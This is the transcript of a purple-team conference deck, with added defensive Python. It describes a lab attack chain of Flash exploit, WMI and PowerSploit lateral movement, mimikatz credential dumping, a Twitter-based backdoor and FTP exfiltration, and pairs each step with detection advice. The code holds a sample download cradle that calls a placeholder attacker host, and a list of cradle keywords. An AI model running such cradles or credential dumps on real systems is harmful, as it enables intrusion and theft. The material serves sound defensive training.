purple view
Post on 07-Jan-2017
Purple View
The recent trend of using Attack and Defense Together
Not OUR idea - backed by many
@raffertylaura | @haydnjohnson
Quick who are we
Haydn Johnson
@haydnjohnson
OSCP
Offensive/Attack Interest
Enjoys presenting
Laura
@raffertylaura
MSc Computer Science (Security/Privacy)
Interested in both sides of security
Loooooves presenting
Contents
1. Basic Term Definition
2. Introduction to Red, Blue and Purple
3. Run through of an Attack
   ○ Gaining Access
   ○ Lateral Movement
   ○ Domain Admin
   ○ Maintaining Access
   ○ Data Exfiltration
4. For each attack:
   ○ Attacking View
   ○ Defenders View
   ○ Possible Purple Team exercises
Definitions
Exploit - The thing used to gain unauthorized access to a system
Payload - What is done after the access is gained (shell, command)
Metasploit - An open source exploit framework, modular
Meterpreter - an advanced, extensible payload that uses in-memory DLL injection
Shell - Gaining Terminal/CMD access remotely
https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
http://www.metasploit.com/
Red Team - Penetration | Offensive
● Scans
● Exploits
● Logic abuse
● Access to things they shouldn’t
Blue Team - Block, Prevent, Detect | Defensive
● Logs
● Emails
● Events
● Triggers
● Networking
● More Logs
Red Team - Goals
● Model recent threats and trends
● Longer term
● Highlight Gaps in Security Controls, detection etc
● Escape and Evade for Persistence
Blue Team - Goals
● Detect Attack
● Respond and Recover
● Produce Actionable Intelligence
● Identify Gaps and investment needs
Purple Team - Offensive & Defensive
Working together to achieve the ultimate goal of making the organization more secure
● Exposes blue team to different threats & attacker mindset
● Test incident detection and response
● Allows red team to sharpen skills
● Policy and procedures tested
● Tuning of controls
Purple Team - Offensive & Defensive
Different types of Purple Teaming
● Red Team sitting with Network Defense team
● Adversary Simulation
● Traffic Generation
● cobaltstrike.com
● Wargaming
Requires total picture involving all areas of the organization
Purple Team - The difference
● Using Security Posture and Weaknesses to find what is most valuable
● Goal Oriented
● Review attack
● Test how teams use services and how they are managed
Purple Team - The difference
● Time to Domain Admin
● Time to Data/Objective
● Time to Respond
● Time to Recover
● Identify where there needs to be more investment
● Measure Impact
Done right, the blue team should come out with better monitoring and response plans.
Purple Team - The difference
● Set up a fake scenario - Assume Breach
● How will the attacker gain access?
● Why have they attacked, what do they want?
● How did they move through the network?
● If they exfiltrated data, how?
Do not turn off servers or block IP addresses; make it realistic
Purple Team - Exercise
“In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary.”
- Raphael Mudge
http://blog.cobaltstrike.com/2014/11/12/adversary-simulation-becomes-a-thing/
Purple Team - DEMO (step by step)
Our exercise
Purple Team - Demo Architecture
Domain: corp.test.com
Tools Used
Red Team:
● Kali Linux
● Metasploit
● Meterpreter
● PowerSploit
● Twittor
Blue Team:
● Wireshark
● Windows Event Logs
Setting up Windows GP
Gaining Access
Hacking Team Flash Exploit
Flash Exploits
● Flash plugins are vulnerable
   ○ You can embed a javascript/binary within a Flash file
   ○ ActionScript to define events to redirect to landing page
● Most exploit kit landing pages redirect to pages containing Flash exploits
   ○ Angler
   ○ Nuclear
   ○ Fiesta
● Installed by default on browser
● New vulnerabilities are identified on almost a weekly basis
Gaining Access
Flash 18.0.0.194
A: Flash Exploit from SecurityFocus
Hacking Team Flash Exploit: http://downloads.securityfocus.com/vulnerabilities/exploits/75568.rb
A: Start Flash Exploit from Kali
A: Redirect Victim
Client1 User navigates to malicious site which redirects to the exploit
A: Client1 is exploited
A: A session is now established with Client1
We can now run Meterpreter
B: Wireshark: Landing Page and Redirect
B: Wireshark: Shell
B: What can you take away
Security Onion, implement it, free
Has snort rules for Flash exploits (need to install)
Confirm if flash is needed for business reasons
Keep flash updated
2811962 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 SSL Cert (trojan.rules)
2811963 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 CnC Beacon (trojan.rules)
https://www.security-database.com/detail.php?alert=CVE-2015-5119
https://security-onion-solutions.github.io/security-onion/
Purple Team - Exercise
● Blue team understands how attackers can gain initial access
● Flash exploits - ongoing issue
● Helps blue team to identify suspicious traffic and what is happening from the attacker perspective
● Red team sees how attacks are visible by blue team and think of ways to make it more stealthy
Privilege Escalation
Not Shown
● We are skipping privilege escalation from Domain User to Local Admin
Lateral Movement
PowerSploit
A: PowerSploit
Available on Github
Open Source
https://github.com/mattifestation/PowerSploit
More than 1 script!
PowerShell Modules
PowerView
Part of PowerShell Empire
Very advanced
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
A: Lateral Movement
The same local Administrator account passwords on multiple computers.
by Sean Metcalf
https://adsecurity.org/?p=1684
Same Passwords for All Local Admins
A: Lateral Movement
PowerSploit
Remote PowerShell
Using Invoke-Shellcode.ps1
A: Base64 Encoding Payload
Remove issues with whitespace
The Hacker Playbook 1 (now 2)
http://thehackerplaybook.com/dashboard/
A: Hosting PowerSploit Invoke-Shellcode.ps1
PowerSploit code hosted on local Kali machine
A: Invoke-WmiMethod
Use PowerShell to connect remotely, create a new process and launch the IEX cradle.
Calls Windows Management Instrumentation (WMI) methods.
The Win32_Process WMI class allows creation of a process.
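The base64-encoded one-liner that the red team launches through Win32_Process is the same string the blue team later finds in the process-creation event (the PowerShell Process Created slide). The following is an added example, not code from the deck, from PowerSploit or from The Hacker Playbook: it decodes a -EncodedCommand argument (PowerShell takes base64 of the UTF-16LE script text) and flags the download-cradle keywords this demo uses. The command line and the KALI_IP host are constructed placeholders.

```python
import base64
import re

# Keywords of the download cradle used in the deck (IEX + WebClient.DownloadString
# fetching Invoke-Shellcode.ps1 over HTTP). Matching is case-insensitive.
CRADLE_INDICATORS = ("IEX", "Invoke-Expression", "DownloadString",
                     "Net.WebClient", "Invoke-Shellcode")

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob. Longest spelling
# first so "-Enc" is not swallowed by the "-e" alternative.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)",
                      re.IGNORECASE)


def decode_encoded_command(command_line):
    """Return the script hidden behind -EncodedCommand, or None if there is none.

    PowerShell expects base64 of the UTF-16LE script text, which is why a plain
    base64 decode looks like 'I.E.X. .' with interleaved NULs; decoding the
    bytes as UTF-16LE recovers the readable text.
    """
    match = ENC_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None   # not valid base64 / not valid UTF-16LE: leave it for a human


def cradle_indicators(script_text):
    """Which cradle keywords appear in the (decoded) script text."""
    lowered = script_text.lower()
    return [k for k in CRADLE_INDICATORS if k.lower() in lowered]


def triage_process_command_line(command_line):
    """Triage one 'Process Command Line' value from a process-creation event."""
    decoded = decode_encoded_command(command_line)
    if decoded is None:
        return {"encoded": False, "script": command_line,
                "indicators": cradle_indicators(command_line)}
    return {"encoded": True, "script": decoded,
            "indicators": cradle_indicators(decoded)}


def build_encoded_command_line(script_text):
    """Constructed sample only: produce the command line the way PowerShell
    expects it, so the decoder can be exercised offline."""
    blob = base64.b64encode(script_text.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NoP -W Hidden -Enc {blob}"


# Constructed cradle mirroring the demo; KALI_IP is a placeholder, not an address.
SAMPLE_CRADLE = ("IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://KALI_IP/Invoke-Shellcode.ps1')")
# Constructed benign command line: an administrator's scheduled script.
SAMPLE_BENIGN = r"powershell.exe -NoProfile -File C:\scripts\nightly-backup.ps1"

if __name__ == "__main__":
    for line in (build_encoded_command_line(SAMPLE_CRADLE), SAMPLE_BENIGN):
        result = triage_process_command_line(line)
        print(result["encoded"], result["indicators"])
```

Run against real 4688 or Sysmon process-creation data, the useful signal is the pair "encoded command" plus "cradle keyword"; encoded commands alone are common in legitimate management tooling, so the decoded text is what the analyst should be shown.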
A: Execute Remote command
Execute command from Client1 to tell Client2 to download and execute shellcode
A: Client1 gives same password
Same password across multiple clients
A: Receive Shell
B: Wireshark traffic
TCP Handshake
Bind Requests
B: Client1 requests remote instance on Client2
B: Client2 eventually asks where is Kali
B: Client2 downloads Invoke-Shellcode.ps1
B: Client1 logs into Client2
B: PowerShell Process Created
B: PowerShell connects to Kali
Client2 reaches out to Kali on port 80
B: What can you take away
Event Correlation - based on event ID, source and destination for remote connections
Implement alerting based on Security Events together
SIEM can/SHOULD do this
Use Log-MD - really great logging tool, especially for PowerShell
http://brakeingsecurity.com/2015-042-log_md-more-malware-archaeology-and-sifting-through-the-junk
http://malwarearchaeology.squarespace.com/log-md/
Purple Team - Benefits
● Identify ways to move around the network
● Identify and confirm Defensive Controls in Place
● Identify what worked, what did not
● Implement changes
● Justification for resources
Privilege Escalation
Local Admin to Domain Admin
A: Local Admin to Domain Admin
● Why escalate privileges from Local Admin to Domain Admin?
● Domain admin - control over active directory!
● Access IT resources
● Create accounts
● Propagate malware
A: Local Admin to Domain Admin
From Client1, map the admin$ share on Client2 and copy over sekurlsa.dll
Use psexec to run mimikatz.exe on Client2
Use sekurlsa::logonpasswords to dump the Domain Admin logon credentials from Client2!
B: Wireshark
B: Event Logs
Client1 logs into Client2 local admin
Client1 runs mimikatz on Client2
Sensitive privilege use from Client1 to Client2
B: What can you take away
● Prevention:
   ○ Access control for shared drive
   ○ Limit access to psexec and monitor use
   ○ Active Directory best practices
● Detection:
   ○ IDS signatures
   ○ SIEM use case - Event correlation between system logs and network proxy logs
   ○ For lateral movement: enable file level auditing
   ○ Canary accounts
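Both takeaway slides (the lateral-movement one and this one) ask for the same thing: correlate Security log events with network records rather than alerting on any one of them. As an added example that is not part of the deck or of any SIEM product, the code below runs two such use cases over a constructed record set that mirrors the demo: a remote logon (event 4624, logon type 3) followed on the same host by powershell.exe spawned from the WMI provider host process (event 4688, parent WmiPrvSE.exe) followed by an outbound connection, and any logon at all by a canary account. Host names, IP addresses and the canary account name are constructed.

```python
from datetime import datetime, timedelta

# Constructed sample telemetry (not the deck's capture). Host names mirror the
# demo; IP addresses are placeholders. "security" records stand for Windows
# Security log events, "network" records for proxy/firewall/netflow entries.
RECORDS = [
    {"source": "security", "time": "2017-01-07 22:01:03", "host": "Client2",
     "event_id": 4624, "logon_type": 3, "account": "Administrator",
     "src_ip": "10.0.0.11"},                     # Client1 logs into Client2 over the network
    {"source": "security", "time": "2017-01-07 22:01:05", "host": "Client2",
     "event_id": 4688, "process": "powershell.exe",
     "parent": "WmiPrvSE.exe"},                  # Win32_Process.Create spawned PowerShell
    {"source": "network", "time": "2017-01-07 22:01:06", "host": "Client2",
     "dst_ip": "10.0.0.99", "dst_port": 80},     # Client2 reaches out to Kali on port 80
    {"source": "security", "time": "2017-01-07 09:15:00", "host": "Client3",
     "event_id": 4688, "process": "powershell.exe",
     "parent": "explorer.exe"},                  # admin opening a console: no alert
    {"source": "security", "time": "2017-01-07 22:30:00", "host": "DC1",
     "event_id": 4624, "logon_type": 3, "account": "svc_backup_canary",
     "src_ip": "10.0.0.12"},                     # canary account: nobody should use it
]

CANARY_ACCOUNTS = {"svc_backup_canary"}   # constructed; pick names that look real


def _ts(record):
    return datetime.strptime(record["time"], "%Y-%m-%d %H:%M:%S")


def detect_wmi_lateral_movement(records, window=timedelta(seconds=60)):
    """Correlate, per host: network logon (4624 type 3) -> PowerShell spawned by
    the WMI provider host (4688) -> outbound connection, all within `window`.
    Each of these alone is noisy; together they match the demo's chain."""
    alerts = []
    for proc in records:
        if (proc["source"] != "security" or proc.get("event_id") != 4688
                or proc.get("process", "").lower() != "powershell.exe"
                or proc.get("parent", "").lower() != "wmiprvse.exe"):
            continue
        host, t_proc = proc["host"], _ts(proc)
        logons = [r for r in records
                  if r["source"] == "security" and r["host"] == host
                  and r.get("event_id") == 4624 and r.get("logon_type") == 3
                  and t_proc - window <= _ts(r) <= t_proc]
        conns = [r for r in records
                 if r["source"] == "network" and r["host"] == host
                 and t_proc <= _ts(r) <= t_proc + window]
        if logons and conns:
            alerts.append({
                "rule": "wmi_remote_powershell_with_callback",
                "host": host,
                "from": logons[0]["src_ip"],
                "to": f"{conns[0]['dst_ip']}:{conns[0]['dst_port']}",
            })
    return alerts


def detect_canary_logons(records, canaries=CANARY_ACCOUNTS):
    """A canary account exists only to be noticed: any logon event is an alert."""
    return [{"rule": "canary_account_logon", "host": r["host"],
             "account": r["account"], "from": r["src_ip"]}
            for r in records
            if r["source"] == "security" and r.get("event_id") == 4624
            and r.get("account") in canaries]


if __name__ == "__main__":
    for alert in detect_wmi_lateral_movement(RECORDS) + detect_canary_logons(RECORDS):
        print(alert)
```

The one-minute window and the parent-process check are the tuning knobs: widen the window and the rule catches slower operators but also more administrators, drop the parent check and every remote PowerShell session on a freshly logged-on host fires. Measuring that trade-off against the red team's actual run is exactly the purple-team exercise the slides propose.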
Purple Team - Benefits
● Blue team observes vulnerabilities/threats which may not have been considered
   ○ Learns how attacker could escalate privileges from local admin to domain admin
● Red team observes the footprint left behind from this attack and possibly how to minimize it
   ○ Can identify potential weaknesses in blue team monitoring/response processes
   ○ Provide more thorough recommendations
Twittor
Backdoor using Twitter
A: Twittor
● Easy to install
● Easy to Use
● Easy to add Shellcode
https://github.com/PaulSec/twittor
A: Twittor - insides
Simple Subprocess execution
Stored as base64 encoded message
A: Pyinstaller
On Github
Turn Python file into EXE
https://github.com/pyinstaller/pyinstaller
A: Pyinstaller
Python File becomes Executable
Twittor: Backdoor Using Twitter
A: Twittor
Python file used as C2 Server
Python file used as backdoor
EXE - Pyinstaller
A: Twittor - Retrieving command
Send Command to execute
Retrieve command
B: Twittor - Network Traffic
Reaching out to API
Normal User Traffic??
B: Twittor - Client system
Backdoor as Python Executable compiled with --no-console flag to hide output
B: Traffic from Client
Reaches out to twitter
Src and Destination are internal IPs, sends to API
B: What can you take away
Check if there are any remote connections after hours, is it against policy?
Again, Correlate logs with known C2 addresses
See if AV picks it up
Purple Team - Benefits
Test if a C2 can reach out to twitter.
Social Media may be blocked via the browser, but some sites can still be accessed via API etc.
If it is not blocked, why not? Can your blue team help to stop this and others?
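The two blue-team points for this stage, after-hours connections and a social-media block that the API host walks straight past, can both be checked against proxy logs. Below is an added example, not code from the deck or from Twittor, run over a few constructed proxy log lines: it shows the weak exact-hostname block beside a domain-suffix block that also covers api.twitter.com, and lists connections to blocked-domain hosts outside a constructed 08:00 to 18:00 working day. The client IP, timestamps and the business-hours policy are all constructed.

```python
from datetime import datetime, time

# Constructed proxy log lines (not the deck's capture): timestamp, client IP, host.
PROXY_LOG = """\
2017-01-07T10:12:44 10.0.0.12 www.example.com
2017-01-07T10:13:02 10.0.0.12 twitter.com
2017-01-07T23:14:02 10.0.0.12 api.twitter.com
2017-01-07T23:19:03 10.0.0.12 api.twitter.com
2017-01-07T03:02:10 10.0.0.12 api.twitter.com
"""

BLOCKED_SITES = {"twitter.com"}              # the browser-level social media block
BUSINESS_HOURS = (time(8, 0), time(18, 0))   # constructed policy: local working day


def parse_proxy_log(text):
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, host = line.split()
        entries.append({"time": datetime.fromisoformat(ts),
                        "client": client, "host": host})
    return entries


def is_blocked_exact(host, blocklist=BLOCKED_SITES):
    """The weak check: matches only the exact host name, so api.twitter.com passes."""
    return host.lower() in blocklist


def is_blocked_domain(host, blocklist=BLOCKED_SITES):
    """The corrected check: the listed domain and every subdomain of it, which is
    what closes the API path the deck's backdoor relies on."""
    h = host.lower().rstrip(".")
    return any(h == d or h.endswith("." + d) for d in blocklist)


def outside_business_hours(ts, hours=BUSINESS_HOURS):
    start, end = hours
    return not (start <= ts.time() < end)


def policy_gaps(entries, blocklist=BLOCKED_SITES):
    """Hosts that slipped past the exact-match block but belong to a blocked domain."""
    return sorted({e["host"] for e in entries
                   if not is_blocked_exact(e["host"], blocklist)
                   and is_blocked_domain(e["host"], blocklist)})


def after_hours_blocked_domain_connections(entries, blocklist=BLOCKED_SITES):
    """Connections to blocked-domain hosts outside working hours. From a desktop
    client this is beacon-shaped traffic, not a user browsing."""
    return [e for e in entries
            if is_blocked_domain(e["host"], blocklist)
            and outside_business_hours(e["time"])]


if __name__ == "__main__":
    entries = parse_proxy_log(PROXY_LOG)
    print("slipped past exact block:", policy_gaps(entries))
    for e in after_hours_blocked_domain_connections(entries):
        print("after hours:", e["time"].isoformat(), e["client"], e["host"])
```

A regular periodic cadence (the two 23:xx entries five minutes apart) is a second signal worth adding once the basic rule works; the deck's exercise is to confirm, with the red team's backdoor actually running, which of these the existing proxy policy and SIEM already catch.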
Data Exfiltration
Clear Text FTP
A: Data Exfiltration Through Clear Text FTP
A: FTP Extraction
Finding Data to extract
A: Finding data
Important data identified
A: Downloading data
A: Data Transferred
B: Meterpreter connection
DLL injection
Lots of chatter
B: FTP connection
Clear Text
B: Successful Transfer
B: What can you take away?
Disable FTP - should not have a business need for it really
If there is a business need, whitelist those IP addresses | Create a group of users specifically for FTP
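Because the FTP control channel is clear text, the same Wireshark stream that shows the blue team the transfer also gives them everything needed to apply the two controls above. As an added example that is not part of the deck, the code below parses a constructed FTP control-channel conversation (in the shape Wireshark's "Follow TCP Stream" presents it), records that a credential crossed the wire readable without storing it, extracts the transfers, and checks the client against an IP allow-list and the user against a dedicated FTP group. The conversation, IP addresses, user names and file name are constructed.

```python
# Constructed FTP control-channel conversation (not the deck's capture), as
# "Follow TCP Stream" would show it: ">" lines are client commands, "<" lines
# are server replies. The password value is a constructed dummy.
FTP_STREAM = """\
< 220 corp-ftp FTP server ready
> USER j.doe
< 331 Password required for j.doe
> PASS Summer2016!
< 230 User j.doe logged in
> TYPE I
< 200 Type set to I
> PASV
< 227 Entering Passive Mode (10,0,0,99,195,80)
> STOR customer_list.xlsx
< 150 Opening BINARY mode data connection
< 226 Transfer complete
> QUIT
< 221 Goodbye
"""

# Constructed policy: the only clients allowed to use FTP, and the group whose
# members may log in to it (the "group of users specifically for FTP").
FTP_ALLOWED_CLIENTS = {"10.0.0.50"}
FTP_USER_GROUP = {"ftp-svc-batch"}

TRANSFER_COMMANDS = {"STOR": "upload", "APPE": "upload", "RETR": "download"}


def parse_ftp_stream(stream_text, client_ip):
    """Pull the user, the fact that a PASS was sent, and the transfers out of a
    clear-text control channel. The password itself is deliberately not kept."""
    session = {"client": client_ip, "user": None,
               "password_seen": False, "transfers": []}
    for line in stream_text.splitlines():
        if not line.startswith(">"):
            continue                             # server replies are not needed here
        parts = line[1:].strip().split(maxsplit=1)
        if not parts:
            continue
        cmd = parts[0].upper()
        arg = parts[1] if len(parts) > 1 else ""
        if cmd == "USER":
            session["user"] = arg
        elif cmd == "PASS":
            session["password_seen"] = True      # credential observable on the wire
        elif cmd in TRANSFER_COMMANDS:
            session["transfers"].append((TRANSFER_COMMANDS[cmd], arg))
    return session


def evaluate_session(session, allowed_clients=FTP_ALLOWED_CLIENTS,
                     user_group=FTP_USER_GROUP):
    """Apply the allow-list and FTP-group controls and report the exposure."""
    findings = []
    if session["password_seen"]:
        findings.append("clear-text credential observed")
    if session["client"] not in allowed_clients:
        findings.append(f"client {session['client']} not on FTP allow-list")
    if session["user"] not in user_group:
        findings.append(f"user {session['user']} not in FTP group")
    for direction, name in session["transfers"]:
        findings.append(f"{direction} of {name}")
    return findings


if __name__ == "__main__":
    for finding in evaluate_session(parse_ftp_stream(FTP_STREAM, "10.0.0.12")):
        print(finding)
```

The file name in the STOR command is the part the exercise measures: whether anything alerted on a spreadsheet leaving a workstation in the clear, and how long it took. With the allow-list and group in place the same parse yields no findings for a permitted batch host, which is the state the slide is arguing for.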
Purple Team - Exercise
Clear Text
Will any alarms trigger?
Understand potential holes in alerting
Measure time to detect and respond
Conclusion
Purple Teaming is Good
Purple Team - Reiteration
Provides more value than a Penetration Test
Should be implemented into a regular schedule
Helps train security personnel
Helps make sure your boxes are tuned
Limitations and Future Work
● So far we have limited detection tools to Windows Server event logs and Wireshark (and a bit of Snort)
● Could be extended for enterprise security tools such as SIEM/IDS
● PowerShell/WMI for blue team
● More advanced attacks, persistence using PowerShell Empire
Obligatory Cute Kat Picture
References are in following slides
Microsoft - 8 minute Video
https://azure.microsoft.com/en-us/documentation/videos/red-vs-blue-internal-security-penetration-testing-of-microsoft-azure/
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
http://www.slideshare.net/beltface/hybrid-talk
A: Downloads PowerShell file
Client2 reaches out to Kali machine